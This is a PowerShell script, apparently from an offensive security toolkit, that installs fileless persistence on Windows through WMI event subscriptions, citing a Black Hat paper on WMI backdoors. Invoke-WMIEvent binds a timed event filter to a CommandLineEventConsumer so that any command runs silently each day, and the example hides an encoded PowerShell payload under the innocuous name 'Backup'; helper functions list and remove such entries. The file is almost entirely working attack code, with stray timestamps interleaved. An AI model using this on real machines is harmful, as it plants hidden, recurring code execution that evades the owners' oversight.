2018-09-18 19:56:33 +00:00
<#
. Synopsis
Invoke-WMIEvent
https : / / www . blackhat . com / docs / us - 15 / materials / us - 15 -Graeber -Abusing -Windows -
Management-Instrumentation -WMI -To -Build -A -Persistent % 20Asynchronous -And -Fileless -
Backdoor-wp . pdf
. DESCRIPTION
PS C: \ > Usage : Invoke-WMIEvent -Name < Name > -Command < Command > -Hour < Hour > -Minute < Minute >
. EXAMPLE
PS C: \ > Get-WMIEvent
. EXAMPLE
PS C: \ > Invoke-WMIEvent -Name Backup -Command " powershell -enc abc " -Hour 10 -Minute 30
. EXAMPLE
PS C: \ > Remove-WMIEvent -Name Backup
#>
Function Invoke-WMIEvent
{
Param
(
[ Parameter ( Mandatory = $true ) ] [ string ]
$Name ,
[ Parameter ( Mandatory = $true ) ] [ string ]
$Command ,
[ string ]
$Hour = 9 ,
[ string ]
$Minute = 30
)
$Filter = Set-WmiInstance -Class __EventFilter -Namespace " root\subscription " -Arguments @ { name = " $Name " ; EventNameSpace = 'root\CimV2' ; QueryLanguage = " WQL " ; Query = " SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = $Hour AND TargetInstance.Minute = $Minute GROUP WITHIN 60 " } ;
$Consumer = Set-WmiInstance -Namespace " root\subscription " -Class 'CommandLineEventConsumer' -Arguments @ { name = " $Name " ; CommandLineTemplate = " $Command " ; RunInteractively = 'false' } ;
Set-WmiInstance -Namespace " root\subscription " -Class __FilterToConsumerBinding -Arguments @ { Filter = $Filter ; Consumer = $Consumer }
Write-Output " "
2018-11-13 21:23:44 +00:00
Write-Output " [+] WMIEvent added: $Name for $Hour : $Minute "
2018-09-18 19:56:33 +00:00
Write-Output " [+] Command: $Command "
Write-Output " "
}
Function Remove-WMIEvent
{
Param
(
[ Parameter ( Mandatory = $true ) ] [ string ]
$Name
)
Get-WmiObject CommandLineEventConsumer -Namespace root \ subscription -Filter " name=' $Name ' " | Remove-WmiObject
Write-Output " "
Write-Output " [+] WMIEvent removed: $Name "
Write-Output " "
}
Function Get-WMIEvent
{
gwmi CommandLineEventConsumer -Namespace root \ subscription
}
